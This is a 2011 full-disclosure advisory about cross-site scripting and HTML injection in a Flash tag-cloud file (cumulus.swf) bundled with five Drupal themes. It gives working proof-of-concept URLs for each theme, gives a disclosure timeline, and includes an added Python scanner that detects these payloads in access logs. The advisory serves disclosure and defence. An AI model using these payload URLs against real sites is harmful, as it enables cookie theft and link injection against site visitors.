Vulnerability in multiple themes for Drupal

2011-10-04 00:00:00
Hello list!

The endless saga continues. After reporting many vulnerable plugins and
widgets that ship this swf-file, here is information about multiple
vulnerable themes ;-).

I want to warn you about a Cross-Site Scripting vulnerability in multiple
themes for Drupal. Many other themes for Drupal and for other engines may
also be vulnerable.

This XSS is similar to the XSS vulnerability in WP-Cumulus, which I disclosed
in 2009 (http://securityvulns.com/Wdocument842.html), because these themes
use cumulus.swf (it is the same tagcloud.swf made by the author of WP-Cumulus).
I wrote about such vulnerabilities in 2009-2011, in particular about the millions
of tagcloud.swf flash files that are vulnerable to XSS attacks, which I covered
in my article "XSS vulnerabilities in 34 millions flash files"
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html).


Affected products:

All versions of the Admire Grunge, Morok, Pushbutton, Danland and Analytic
themes for Drupal are vulnerable.


Details:

XSS (WASC-08):

http://site/themes/admire_grunge/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/themes/morok/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/themes/pushbutton/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/sites/all/themes/danland/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/themes/analytic/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

The code executes after a click, so this is strictly a social-engineering XSS.
As in WP-Cumulus, an HTML Injection attack is also possible.

HTML Injection (WASC-12):

http://site/path/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E


Fixed version of swf-file:

All users of these and other themes, plugins and widgets (and their
developers) that ship this swf-file can fix the issue by updating the
swf-file to the fixed version.

But as I wrote in my last advisory
(http://lists.grok.org.uk/pipermail/full-disclosure/2011-September/082656.html),
the developer of WP-Cumulus fixed only the XSS vector, not the HTML Injection
vector. So it is still possible to conduct HTML Injection attacks (injecting
arbitrary links) on all versions of this swf-file, including the version with
the XSS hole fixed. This should be taken into account.
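The two vectors above differ only in the scheme and host of the injected href, which is why a fix that blocks javascript: links still leaves arbitrary external links open. The following Python script, added here as an illustration and not part of the original advisory or of the cumulus.swf/WP-Cumulus code, shows how a site operator can tell the two apart in web server access logs: it picks out requests for cumulus.swf or tagcloud.swf, decodes the tagcloud parameter, parses the <tags> XML the movie expects, and classifies each <a href> as a script-scheme link (XSS), a link to a host outside an allowlist (HTML Injection), or benign. The log lines, the allowlist hosts (example.org) and the external host (external.invalid) are constructed values.

```python
import re
from urllib.parse import urlsplit, parse_qs
import xml.etree.ElementTree as ET

# Hosts the tag cloud may legitimately link to. Assumed, deployment-specific
# allowlist; "example.org" is a constructed value, not from the advisory.
ALLOWED_LINK_HOSTS = {"example.org", "www.example.org"}

# Schemes that execute script when the Flash movie follows the link.
SCRIPT_SCHEMES = {"javascript", "vbscript", "data"}

# Flash movies known (from the advisory) to accept the tagcloud parameter.
TAGCLOUD_MOVIES = {"cumulus.swf", "tagcloud.swf"}

# Matches the request line inside a Common/Combined Log Format entry.
LOG_LINE = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+"')


def classify_tagcloud(tagcloud_xml, allowed_hosts=ALLOWED_LINK_HOSTS):
    """Classify every link in one decoded tagcloud value.

    Returns a list of (kind, href) tuples where kind is:
      'xss'            - href uses a script scheme (javascript:, ...)
      'html_injection' - href points at a host outside the allowlist,
                         or uses an unrecognised scheme
      'malformed'      - the value is not the <tags> document the movie expects
    An empty list means every link is a same-site or allowlisted link.
    """
    try:
        root = ET.fromstring(tagcloud_xml)
    except ET.ParseError:
        return [("malformed", tagcloud_xml)]
    if root.tag != "tags":
        return [("malformed", tagcloud_xml)]

    findings = []
    for anchor in root.iter("a"):
        href = (anchor.get("href") or "").strip()
        parts = urlsplit(href)
        scheme = parts.scheme.lower()
        if scheme in SCRIPT_SCHEMES:
            findings.append(("xss", href))
        elif scheme in ("http", "https"):
            if parts.hostname not in allowed_hosts:
                findings.append(("html_injection", href))
        elif scheme:
            # ftp:, file: and other schemes are still attacker-chosen links.
            findings.append(("html_injection", href))
        # No scheme: a relative, same-site link, which is what a tag cloud
        # normally emits, so nothing is reported.
    return findings


def scan_access_log(lines):
    """Return [(url, findings)] for tag-cloud requests that carry suspicious links."""
    results = []
    for line in lines:
        match = LOG_LINE.search(line)
        if not match:
            continue
        url = match.group("url")
        parts = urlsplit(url)
        if parts.path.rsplit("/", 1)[-1] not in TAGCLOUD_MOVIES:
            continue
        # parse_qs percent-decodes the value and turns '+' back into spaces,
        # reproducing what the movie receives.
        for tagcloud in parse_qs(parts.query).get("tagcloud", []):
            findings = classify_tagcloud(tagcloud)
            if findings:
                results.append((url, findings))
    return results


# Constructed sample log entries: a script-scheme link, an external link,
# a legitimate allowlisted link, and an unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Oct/2011:10:15:02 +0000] "GET /themes/morok/cumulus.swf'
    "?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'"
    "+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E HTTP/1.1\" 200 15234",
    '203.0.113.5 - - [04/Oct/2011:10:15:09 +0000] "GET /sites/all/themes/danland/cumulus.swf'
    "?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://external.invalid/'%3E"
    "Click%20me%3C/a%3E%3C/tags%3E HTTP/1.1\" 200 15234",
    '198.51.100.7 - - [04/Oct/2011:10:16:00 +0000] "GET /themes/analytic/cumulus.swf'
    "?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://www.example.org/tag/drupal'%3E"
    "drupal%3C/a%3E%3C/tags%3E HTTP/1.1\" 200 15234",
    '198.51.100.7 - - [04/Oct/2011:10:16:05 +0000] "GET /node/12 HTTP/1.1" 200 8021',
]

if __name__ == "__main__":
    for url, findings in scan_access_log(SAMPLE_LOG):
        for kind, href in findings:
            print(f"{kind:15} {href}  <- {url.split('?', 1)[0]}")
```

Because the script classifies by scheme and host rather than by a fixed payload string, it reports the HTML Injection vector even when the XSS vector no longer fires, which is the gap left by the partial fix described above. In a real deployment the allowlist would hold the site's own hostnames, and any hit is a reason to replace or remove the swf-file rather than to filter requests.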


Timeline:

2009.11.09 - disclosed the WP-Cumulus vulnerability at my site.
2009.11.11 - informed the developer of WP-Cumulus.
2009.11.15 - the developer of WP-Cumulus fixed the XSS (but not the HTML Injection).
2011.10.01 - disclosed the five vulnerable themes for Drupal at my site.
Many other themes for Drupal and for other engines may also be vulnerable.

I wrote about these vulnerabilities at my site:
http://websecurity.com.ua/5407/

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua